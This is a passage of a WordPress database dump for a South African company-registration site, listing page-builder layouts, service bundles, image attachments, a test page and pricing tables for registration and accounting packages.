14:11:04','',0,'https://companyregistration.online/?page_id=27858',0,'page','',0),(27865,1,'2016-10-16 16:04:33','2016-10-16 14:04:33','[et_bloom_inline optin_id=optin_5]','LP Free Ebook','','publish','closed','closed','','lp-free-ebook-2','','','2016-10-16 20:49:43','2016-10-16 18:49:43','',0,'https://companyregistration.online/?page_id=27865',0,'page','',0),(27911,1,'2016-12-01 12:34:57','2016-12-01 10:34:57','','restoration-of-company','','inherit','open','closed','','restoration-of-company-2','','','2016-12-01 12:35:12','2016-12-01 10:35:12','',72,'https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1.png',0,'attachment','image/png',0),(27913,1,'2016-12-01 12:39:37','2016-12-01 10:39:37','','annual-returns','','inherit','open','closed','','annual-returns-2','','','2016-12-01 12:39:51','2016-12-01 10:39:51','',70,'https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns.jpg',0,'attachment','image/jpeg',0),(27920,1,'2016-12-09 11:37:35','2016-12-09 09:37:35','','kjg987','100% discount for Ebook \"What I need to know before I start my business\"','trash','closed','closed','','kjg987__trashed','','','2019-08-08 15:20:39','2019-08-08 13:20:39','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=27920',0,'shop_coupon','',0),(27942,1,'2017-06-09 08:54:15','2017-06-09 06:54:15','[et_pb_section bb_built=\"1\" admin_label=\"section\" module_class=\"kb-zoomout\" _builder_version=\"3.0.51\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,211,211,0.7)\" background_color_gradient_end=\"rgba(5,5,5,0.72)\" background_color_gradient_direction=\"207deg\" background_image=\"https://companyregistration.online/wp-content/uploads/2017/06/121120.jpg\" background_blend=\"color-burn\"][et_pb_row admin_label=\"row\" custom_padding=\"|||\" _builder_version=\"3.0.51\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"1_3\"][et_pb_cta admin_label=\"Directors &amp; Shareholders\" title=\"Owner Managed Business\" button_url=\"#\" button_text=\"Start Here\" use_background_color=\"off\" max_width_last_edited=\"off|desktop\" disabled_on=\"off|off|off\" _builder_version=\"3.0.53\" header_font=\"Abel|on||on|\" header_font_size=\"35\" background_color_gradient_direction=\"177deg\" use_border_color=\"on\" border_width=\"0px\" custom_padding=\"|10px||10px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#ffffff\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(255,255,255,0.01)\" button_border_radius_hover=\"15\"]\r\n\r\n&nbsp;\r\n\r\nBusiness owners who will manage the company\r\n\r\n&nbsp;\r\n\r\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_cta admin_label=\"Directors &amp; Shareholders\" title=\"Owner Managed Business\" button_url=\"#\" button_text=\"Start Here\" use_background_color=\"off\" max_width_last_edited=\"off|desktop\" disabled_on=\"off|off|off\" _builder_version=\"3.0.53\" header_font=\"Abel|on||on|\" header_font_size=\"35\" background_color_gradient_direction=\"177deg\" use_border_color=\"on\" border_width=\"0px\" custom_padding=\"|10px||10px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#ffffff\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(255,255,255,0.01)\" button_border_radius_hover=\"15\"]\r\n\r\n&nbsp;\r\n\r\nBusiness owners who will manage the company\r\n\r\n&nbsp;\r\n\r\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_cta admin_label=\"Directors &amp; Shareholders\" title=\"Owner Managed Business\" button_url=\"#\" button_text=\"Start Here\" use_background_color=\"off\" max_width_last_edited=\"off|desktop\" disabled_on=\"off|off|off\" _builder_version=\"3.0.53\" header_font=\"Abel|on||on|\" header_font_size=\"35\" background_color_gradient_direction=\"177deg\" use_border_color=\"on\" border_width=\"0px\" custom_padding=\"|10px||10px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#ffffff\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(255,255,255,0.01)\" button_border_radius_hover=\"15\"]\r\n\r\n&nbsp;\r\n\r\nBusiness owners who will manage the company\r\n\r\n&nbsp;\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section bb_built=\"1\" custom_padding=\"|0px||0px\" _builder_version=\"3.0.51\"][et_pb_row make_fullwidth=\"on\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_position_3=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" background_repeat_3=\"no-repeat\" _builder_version=\"3.0.51\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"1_4\"][et_pb_blurb admin_label=\"Standard box bundle\" title=\"Standard Package\" url=\"https://companyregistration.online/shop/bundled-products/basic-bundle/\" use_circle=\"on\" circle_color=\"#ffffff\" use_circle_border=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2017/06/gift-bag-template.gif\" alt=\"business pro box bundle\" animation=\"bottom\" text_orientation=\"center\" _builder_version=\"3.0.53\" header_font_size=\"28\" use_border_color=\"on\" border_width=\"2px\"]\r\n\r\nIncome Tax registration\r\nName reservation\r\nCompany registration\r\nTax Clearance\r\nBEE Affidavit\r\n\r\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb admin_label=\"Gold box bundle\" title=\"Gold Package\" url=\"https://companyregistration.online/shop/bundled-products/gold-bundle/\" use_circle=\"on\" circle_color=\"#ffffff\" use_circle_border=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2017/06/gift-bag-template.gif\" alt=\"business pro box bundle\" animation=\"bottom\" text_orientation=\"center\" _builder_version=\"3.0.53\" header_font_size=\"28\"]\r\n\r\nIncome Tax registration\r\nName reservation\r\nCompany registration\r\nTax Clearance\r\nBEE Affidavit\r\nShare Certificate\r\nShare register\r\n\r\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb admin_label=\"Tender Ready box bundle\" title=\"Tender Ready Package\" url=\"https://companyregistration.online/shop/bundled-products/tender-ready/\" use_circle=\"on\" circle_color=\"#ffffff\" use_circle_border=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2017/06/gift-bag-template.gif\" alt=\"business pro box bundle\" animation=\"bottom\" text_orientation=\"center\" _builder_version=\"3.0.53\" header_font_size=\"28\"]\r\n\r\nIncome Tax registration\r\nName reservation\r\nCompany registration\r\nTax Clearance\r\nBEE Affidavit\r\nShare Certificate\r\nShare register\r\nVat registration\r\n\r\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb admin_label=\"Business Pro box bundle\" title=\"Business Pro Package\" url=\"https://companyregistration.online/shop/bundled-products/business-pro/\" use_circle=\"on\" circle_color=\"#ffffff\" use_circle_border=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2017/06/gift-bag-template.gif\" alt=\"business pro box bundle\" animation=\"bottom\" text_orientation=\"center\" _builder_version=\"3.0.53\" header_font_size=\"30\"]\r\n\r\nIncome Tax registration\r\nName reservation\r\nCompany registration\r\nTax Clearance\r\nBEE Affidavit\r\nShare Certificate\r\nShare register\r\nVat registration\r\nPAYE registration\r\n\r\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row make_fullwidth=\"on\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_position_3=\"top_left\" background_position_4=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" background_repeat_3=\"no-repeat\" background_repeat_4=\"no-repeat\" _builder_version=\"3.0.53\"][et_pb_column type=\"1_4\"][et_pb_button admin_label=\"Standard package button\" button_url=\"https://companyregistration.online/shop/bundled-products/basic-bundle/\" button_text=\"Show Me More\" button_alignment=\"center\" _builder_version=\"3.0.53\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#000000\" button_text_color_hover=\"#000000\" button_bg_color_hover=\"rgba(255,255,255,0)\" button_border_color_hover=\"#0c71c3\" button_border_radius_hover=\"15\" background_color=\"#c40079\" /][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_button admin_label=\"Gold package button\" button_url=\"https://companyregistration.online/shop/bundled-products/gold-bundle/\" button_text=\"Show Me More\" button_alignment=\"center\" _builder_version=\"3.0.53\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#000000\" button_text_color_hover=\"#000000\" button_bg_color_hover=\"rgba(255,255,255,0)\" button_border_color_hover=\"#0c71c3\" button_border_radius_hover=\"15\" background_color=\"#c40079\" /][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_button admin_label=\"Tender Ready package button\" button_url=\"https://companyregistration.online/shop/bundled-products/tender-ready/\" button_text=\"Show Me More\" button_alignment=\"center\" _builder_version=\"3.0.53\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#000000\" button_text_color_hover=\"#000000\" button_bg_color_hover=\"rgba(255,255,255,0)\" button_border_color_hover=\"#0c71c3\" button_border_radius_hover=\"15\" background_color=\"#c40079\" /][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_button admin_label=\"business Pro package button\" button_url=\"https://companyregistration.online/shop/bundled-products/business-pro/\" button_text=\"Show Me More\" button_alignment=\"center\" _builder_version=\"3.0.53\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#000000\" button_text_color_hover=\"#000000\" button_bg_color_hover=\"rgba(255,255,255,0)\" button_border_color_hover=\"#0c71c3\" button_border_radius_hover=\"15\" background_color=\"#c40079\" /][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section bb_built=\"1\" _builder_version=\"3.0.53\"][et_pb_row make_fullwidth=\"on\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" _builder_version=\"3.0.51\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"2_3\"][et_pb_shop type=\"product_category\" include_categories=\"company-registration\" columns_number=\"4\" orderby=\"price\" sale_badge_color=\"#7cda24\" _builder_version=\"3.0.51\" title_font_size=\"16px\" price_font_size=\"13px\" price_text_color=\"#0004f7\" /][et_pb_shop posts_number=\"8\" columns_number=\"4\" _builder_version=\"3.0.53\" /][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_cta title=\"New Business Owners\" button_url=\"https://companyregistration.online/shop/business-tools/what-i-need-to-know-before-i-start-my-business\" button_text=\"Start Here\" _builder_version=\"3.0.53\" use_background_color_gradient=\"on\" background_color_gradient_type=\"radial\" use_border_color=\"on\" border_color=\"#0c71c3\" border_width=\"2px\" custom_margin=\"|||50px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#0c71c3\" button_text_color_hover=\"#0c71c3\" button_bg_color_hover=\"#ffffff\" button_border_color_hover=\"#0c71c3\" button_border_radius_hover=\"15\"]\r\n<p style=\"text-align: center;\">Having a clear road map is of paramount importance when starting a new business.</p>\r\n<p style=\"text-align: center;\">At C.R.O you will find guidance and a step by step road map to success.</p>\r\n[/et_pb_cta][et_pb_divider height=\"100\" _builder_version=\"3.0.53\" /][et_pb_signup mailchimp_list=\"companyregistration.online division of MAW Inc|542068cd37\" title=\"Subscribe to our news letter \" background_color=\"rgba(0,0,0,0.07)\" background_layout=\"light\" text_orientation=\"center\" _builder_version=\"3.0.53\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#000000\" button_text_color_hover=\"#000000\" button_bg_color_hover=\"rgba(255,255,255,0)\" button_border_color_hover=\"#0c71c3\" button_border_radius_hover=\"15\"]\r\n\r\nGain Tips &amp; Tricks from our monthly newsletter to better run your business.\r\n\r\n[/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section bb_built=\"1\" _builder_version=\"3.0.53\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#eb007e\" background_color_gradient_end=\"#3a86ff\"][et_pb_row make_fullwidth=\"on\" background_position_1=\"top_left\" background_repeat_1=\"no-repeat\" _builder_version=\"3.0.51\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"View Our Product Range\" title=\"View Our Product Range\" button_url=\"#\" button_text=\"View\" use_background_color=\"off\" _builder_version=\"3.0.53\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#0c71c3\" button_border_color=\"#0c71c3\" button_border_radius=\"15\" button_use_icon=\"on\" button_icon=\"%%144%%\" button_icon_color=\"#000000\" button_text_color_hover=\"#000000\" button_bg_color_hover=\"#ffffff\" button_border_color_hover=\"#0c71c3\" button_border_radius_hover=\"15\" /][/et_pb_column][/et_pb_row][/et_pb_section]','Home 2.0','','publish','closed','closed','','home-2-0','','','2017-07-03 09:23:35','2017-07-03 07:23:35','',0,'https://companyregistration.online/?page_id=27942',0,'page','',0),(27970,1,'2017-06-11 15:58:30','2017-06-11 13:58:30','[email_verification]','Email Verification','','publish','closed','closed','','email-verification','','','2017-06-18 09:28:20','2017-06-18 07:28:20','',0,'https://companyregistration.online/email-verification/',0,'fmemailverification','',0),(27999,1,'2017-06-11 21:23:08','2017-06-11 19:23:08','','ChildThemeDivi','','publish','closed','closed','','childthemedivi','','','2019-07-23 21:14:44','2019-07-23 19:14:44','',0,'https://companyregistration.online/childthemedivi/',0,'custom_css','',0),(28066,1,'2017-07-03 11:23:22','2017-07-03 09:23:22','[et_pb_section bb_built=\"1\" fullwidth=\"off\" specialty=\"off\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text _builder_version=\"3.0.58\" background_layout=\"light\" text_orientation=\"left\" border_style=\"solid\"]\r\n\r\nlkajshclkads chqdwk;fnqldjcfho;qekfmqejgcfqiorjfq\r\n\r\n&nbsp;\r\n\r\n[product_category category=\"combo-deals\"]\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','testing woo e Commerce','','publish','closed','closed','','testing-woo-e-commerce','','','2017-07-03 11:38:50','2017-07-03 09:38:50','',0,'https://companyregistration.online/?page_id=28066',0,'page','',0),(28088,3,'2017-06-30 12:04:22','2017-06-30 10:04:22','','Basic Bundle','<h3>This Package Include The Following:</h3>\r\n<ul>\r\n 	<li>Income Tax registration</li>\r\n 	<li>Name reservation</li>\r\n 	<li>Company registration</li>\r\n 	<li>Tax Clearance</li>\r\n 	<li>BEE Affidavit</li>\r\n</ul>','publish','open','closed','','basic-bundle','','','2017-11-14 13:17:02','2017-11-14 11:17:02','',0,'https://companyregistration.online/?post_type=product&#038;p=28088',0,'product','',0),(28090,3,'2017-07-04 12:01:48','2017-07-04 10:01:48','','Gold Bundle','<h3>This Package Include The Following:</h3>\r\n<ul>\r\n 	<li>Income Tax registration</li>\r\n 	<li>Name reservation</li>\r\n 	<li>Company registration</li>\r\n 	<li>Tax Clearance</li>\r\n 	<li>BEE Affidavit</li>\r\n 	<li>Share Certificate</li>\r\n 	<li>Share register</li>\r\n</ul>','publish','open','closed','','gold-bundle','','','2017-11-14 13:14:00','2017-11-14 11:14:00','',0,'https://companyregistration.online/?post_type=product&#038;p=28090',0,'product','',0),(28091,3,'2017-07-04 11:57:34','2017-07-04 09:57:34','','Tender Ready','<h3></h3>\r\n<h3>This package includes the following:</h3>\r\n<ul>\r\n 	<li>Company registration</li>\r\n 	<li>Vat registration</li>\r\n 	<li>Income Tax registration</li>\r\n 	<li>Name reservation</li>\r\n 	<li>Tax Clearance</li>\r\n 	<li>BEE Affidavit</li>\r\n 	<li>Share Certificate</li>\r\n 	<li>Share register</li>\r\n</ul>','publish','closed','closed','','tender-ready','','','2018-05-20 08:03:48','2018-05-20 06:03:48','',0,'https://companyregistration.online/?post_type=product&#038;p=28091',0,'product','',0),(28092,3,'2017-07-04 12:00:14','2017-07-04 10:00:14','','Business Pro','<h3>This Package Includes:</h3>\r\n<ul>\r\n 	<li>Income Tax registration</li>\r\n 	<li>Name reservation</li>\r\n 	<li>Company registration</li>\r\n 	<li>Tax Clearance</li>\r\n 	<li>BEE Affidavit</li>\r\n 	<li>Share Certificate</li>\r\n 	<li>Share register</li>\r\n 	<li>Vat registration</li>\r\n 	<li>PAYE registration</li>\r\n</ul>','publish','open','closed','','business-pro','','','2017-11-14 13:17:20','2017-11-14 11:17:20','',0,'https://companyregistration.online/?post_type=product&#038;p=28092',0,'product','',0),(28098,3,'2017-06-28 09:32:51','2017-06-28 07:32:51','','14-1403-Company-Web-Header_2','','inherit','open','closed','','14-1403-company-web-header_2','','','2017-06-28 09:32:51','2017-06-28 07:32:51','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/14-1403-Company-Web-Header_2.jpg',0,'attachment','image/jpeg',0),(28099,3,'2017-06-28 09:32:58','2017-06-28 07:32:58','','121120','','inherit','open','closed','','121120','','','2017-06-28 09:32:58','2017-06-28 07:32:58','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/121120.jpg',0,'attachment','image/jpeg',0),(28100,3,'2017-06-28 09:33:03','2017-06-28 07:33:03','','bg-header-team1','','inherit','open','closed','','bg-header-team1','','','2017-06-28 09:33:03','2017-06-28 07:33:03','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/bg-header-team1.jpg',0,'attachment','image/jpeg',0),(28101,3,'2017-06-28 09:33:05','2017-06-28 07:33:05','','company-header','','inherit','open','closed','','company-header','','','2017-06-28 09:33:05','2017-06-28 07:33:05','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/company-header.jpg',0,'attachment','image/jpeg',0),(28102,3,'2017-06-28 09:33:08','2017-06-28 07:33:08','','company-header-careers','','inherit','open','closed','','company-header-careers','','','2017-06-28 09:33:08','2017-06-28 07:33:08','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/company-header-careers.jpg',0,'attachment','image/jpeg',0),(28103,3,'2017-06-28 09:33:12','2017-06-28 07:33:12','','company-header-team','','inherit','open','closed','','company-header-team','','','2017-06-28 09:33:12','2017-06-28 07:33:12','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/company-header-team.jpg',0,'attachment','image/jpeg',0),(28104,3,'2017-06-28 09:33:14','2017-06-28 07:33:14','','cropped-header5','','inherit','open','closed','','cropped-header5','','','2017-06-28 09:33:14','2017-06-28 07:33:14','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/cropped-header5.jpg',0,'attachment','image/jpeg',0),(28105,3,'2017-06-28 09:33:21','2017-06-28 07:33:21','','header_companyprofile-1','','inherit','open','closed','','header_companyprofile-1','','','2017-06-28 09:33:21','2017-06-28 07:33:21','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/header_companyprofile-1.png',0,'attachment','image/png',0),(28106,3,'2017-06-28 09:33:35','2017-06-28 07:33:35','','Management_header','','inherit','open','closed','','management_header','','','2017-06-28 09:33:35','2017-06-28 07:33:35','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/Management_header.jpg',0,'attachment','image/jpeg',0),(28107,3,'2017-06-28 09:33:39','2017-06-28 07:33:39','','POWERH_Header-Data-1140x410','','inherit','open','closed','','powerh_header-data-1140x410','','','2017-06-28 09:33:39','2017-06-28 07:33:39','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/POWERH_Header-Data-1140x410.jpg',0,'attachment','image/jpeg',0),(28108,3,'2017-06-28 09:33:49','2017-06-28 07:33:49','','WPVortex','','inherit','open','closed','','wpvortex','','','2017-06-28 09:33:49','2017-06-28 07:33:49','',27942,'https://companyregistration.online/wp-content/uploads/2017/06/WPVortex.jpg',0,'attachment','image/jpeg',0),(28304,1,'2017-07-02 23:47:08','2017-07-02 21:47:08','[et_pb_section fb_built=\"1\" custom_padding=\"-20px|0px|0px|0px\" disabled_on=\"on|on|on\" admin_label=\"Smart slider\" _builder_version=\"3.0.51\" background_color_gradient_direction=\"164deg\" disabled=\"on\" template_type=\"section\"][et_pb_row custom_padding=\"3px|0px|0px|0px\" custom_margin=\"|||\" admin_label=\"row\" _builder_version=\"3.0.53\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.0.51\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"]<div>[smartslider3 slider=2]</div>\n<div></div>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Smart slider for home','','publish','closed','closed','','smart-slider-for-home','','','2017-07-02 23:47:08','2017-07-02 21:47:08','',0,'https://companyregistration.online/et_pb_layout/smart-slider-for-home/',0,'et_pb_layout','',0),(28314,1,'2017-07-03 00:45:07','2017-07-02 22:45:07','','Sa-Flag-optimised','','inherit','open','closed','','sa-flag-optimised','','','2017-07-03 00:45:07','2017-07-02 22:45:07','',0,'https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png',0,'attachment','image/png',0),(28359,3,'2017-07-03 10:33:46','2017-07-03 08:33:46','','advance1600','','inherit','open','closed','','advance1600','','','2017-07-03 10:33:46','2017-07-03 08:33:46','',4,'https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png',0,'attachment','image/png',0),(28429,2,'2017-07-03 15:55:09','0000-00-00 00:00:00','<p>[et_pb_section bb_built=\"1\"][et_pb_row][/et_pb_row][/et_pb_section]</p>','Product Categories Divi','','draft','closed','closed','','','','','2017-07-03 15:55:09','2017-07-03 13:55:09','',0,'https://companyregistration.online/?page_id=28429',0,'page','',0),(28430,2,'2017-07-03 16:07:20','0000-00-00 00:00:00','[et_pb_section fb_built=\"1\" _builder_version=\"3.0.47\"][et_pb_row _builder_version=\"3.0.58\"][et_pb_column type=\"2_3\" _builder_version=\"3.0.58\" parallax=\"off\" parallax_method=\"on\"][et_pb_shop type=\"product_category\" include_categories=\"company-registration\" _builder_version=\"3.0.58\" title_font=\"|on|||\" price_font=\"|on|||\" price_text_color=\"#0c71c3\" columns_number=\"4\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.58\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][/et_pb_row][/et_pb_section]','Product Category Divi','','draft','closed','closed','','','','','2017-07-03 16:07:20','2017-07-03 14:07:20','',0,'https://companyregistration.online/?page_id=28430',0,'page','',0),(28460,3,'2017-07-04 17:18:58','2017-07-04 15:18:58','','BB-business-Pro-Box','','inherit','open','closed','','bb-business-pro-box','','','2017-07-04 17:18:58','2017-07-04 15:18:58','',0,'https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box.gif',0,'attachment','image/gif',0),(28461,3,'2017-07-04 17:19:09','2017-07-04 15:19:09','','BB-Gold-Box','','inherit','open','closed','','bb-gold-box','','','2017-07-04 17:19:09','2017-07-04 15:19:09','',0,'https://companyregistration.online/wp-content/uploads/2017/07/BB-Gold-Box.gif',0,'attachment','image/gif',0),(28462,3,'2017-07-04 17:19:16','2017-07-04 15:19:16','','BB-Standard-Box','','inherit','open','closed','','bb-standard-box','','','2017-07-04 17:19:16','2017-07-04 15:19:16','',0,'https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box.gif',0,'attachment','image/gif',0),(28463,3,'2017-07-04 17:19:22','2017-07-04 15:19:22','','BB-Tender-Ready-Box','','inherit','open','closed','','bb-tender-ready-box','','','2017-07-04 17:19:22','2017-07-04 15:19:22','',0,'https://companyregistration.online/wp-content/uploads/2017/07/BB-Tender-Ready-Box.gif',0,'attachment','image/gif',0),(28503,3,'2017-07-06 13:19:26','2017-07-06 11:19:26','[et_pb_section bb_built=\"1\" _builder_version=\"3.0.58\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(43,135,218,0.51)\" background_color_gradient_end=\"rgba(131,0,233,0.5)\"][et_pb_row _builder_version=\"3.0.58\" background_position_1=\"top_left\" background_repeat_1=\"no-repeat\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\"][et_pb_text _builder_version=\"3.0.58\" background_layout=\"light\" text_orientation=\"left\" border_style=\"solid\"]\r\n<h1 style=\"text-align: center;\">Here you are able to customize the package that best suit your business needs</h1>\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section bb_built=\"1\" fullwidth=\"off\" specialty=\"off\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_code _builder_version=\"3.0.58\"][Form id=\"14\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section bb_built=\"1\" fullwidth=\"off\" specialty=\"off\"][et_pb_row][et_pb_column type=\"2_3\"][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text _builder_version=\"3.0.58\" background_layout=\"light\" text_orientation=\"left\" border_style=\"solid\"]\r\n<ul class=\"et_pb_pricing\">\r\n 	<li>Income Tax registration : R99.99</li>\r\n 	<li>Name reservation          : R99.99</li>\r\n 	<li>Company registration    : R99.99</li>\r\n 	<li>Tax Clearance               : R99.99</li>\r\n 	<li>BEE Affidavit                 : R99.99</li>\r\n 	<li>Share Certificate           : R99.99</li>\r\n 	<li>Share register                : R99.99</li>\r\n 	<li>Vat registration              : R99.99</li>\r\n 	<li>PAYE registration          : R99.99</li>\r\n</ul>\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Custom Package','','publish','closed','closed','','custom-package','','','2017-07-06 17:00:36','2017-07-06 15:00:36','',0,'https://companyregistration.online/?page_id=28503',0,'page','',0),(28513,3,'2017-07-07 09:34:44','0000-00-00 00:00:00','[et_pb_section bb_built=\"1\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_pricing_tables _builder_version=\"3.0.58\" show_bullet=\"on\" center_list_items=\"off\" remove_featured_drop_shadow=\"off\" border_style=\"solid\" custom_button=\"off\" button_letter_spacing=\"0\" button_icon_placement=\"right\" button_letter_spacing_hover=\"0\" header_background_color=\"rgba(163,74,232,0.32)\"] [et_pb_pricing_table title=\"Business\" subtitle=\" Standard\" currency=\"R\" per=\"month\" sum=\"999\" use_background_color_gradient=\"off\" background_color_gradient_start=\"#2b87da\" background_color_gradient_end=\"#29c4a9\" background_color_gradient_type=\"linear\" background_color_gradient_direction=\"180deg\" background_color_gradient_direction_radial=\"center\" background_color_gradient_start_position=\"0%\" background_color_gradient_end_position=\"100%\" parallax=\"off\" parallax_method=\"on\" background_size=\"cover\" background_position=\"center\" background_repeat=\"no-repeat\" background_blend=\"normal\" allow_player_pause=\"off\" featured=\"off\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" subheader_font_select=\"default\" subheader_font=\"||||\" currency_frequency_font_select=\"default\" currency_frequency_font=\"||||\" price_font_select=\"default\" price_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\"]\r\n\r\nIncome Tax registration\r\n\r\nName reservation\r\n\r\nCompany registration\r\n\r\nTax Clearance\r\n\r\nBEE Affidavit\r\n\r\nShare Certificate\r\n\r\nShare register\r\n\r\nVat registration\r\n\r\nPAYE registration\r\n\r\n[/et_pb_pricing_table][et_pb_pricing_table title=\"Accounting\" subtitle=\"Standard\" currency=\"R\" per=\"month\" sum=\"3600\" use_background_color_gradient=\"off\" background_color_gradient_start=\"#2b87da\" background_color_gradient_end=\"#29c4a9\" background_color_gradient_type=\"linear\" background_color_gradient_direction=\"180deg\" background_color_gradient_direction_radial=\"center\" background_color_gradient_start_position=\"0%\" background_color_gradient_end_position=\"100%\" parallax=\"off\" parallax_method=\"on\" background_size=\"cover\" background_position=\"center\" background_repeat=\"no-repeat\" background_blend=\"normal\" allow_player_pause=\"off\" featured=\"off\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" subheader_font_select=\"default\" subheader_font=\"||||\" currency_frequency_font_select=\"default\" currency_frequency_font=\"||||\" price_font_select=\"default\" price_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\"]\r\n\r\nCloud Accounting\r\n\r\nZero Data Entry\r\n\r\nDedicated Accounted\r\n\r\nBi Monthly Processing\r\n\r\nPayroll Services (5 Emplyees)\r\n\r\nReconciliation Of All Accounts  <a href=\"http://mawinc.co.za/services-pricing-2/#Reconciliation\">  </a>\r\n\r\nBi Monthly Management Accounts\r\n\r\n+Annual Financial Statements\r\n\r\nTax Services\r\n\r\nAccounting And Tax Support Chanel\r\n\r\nTax Forecast\r\n\r\n[/et_pb_pricing_table][et_pb_pricing_table 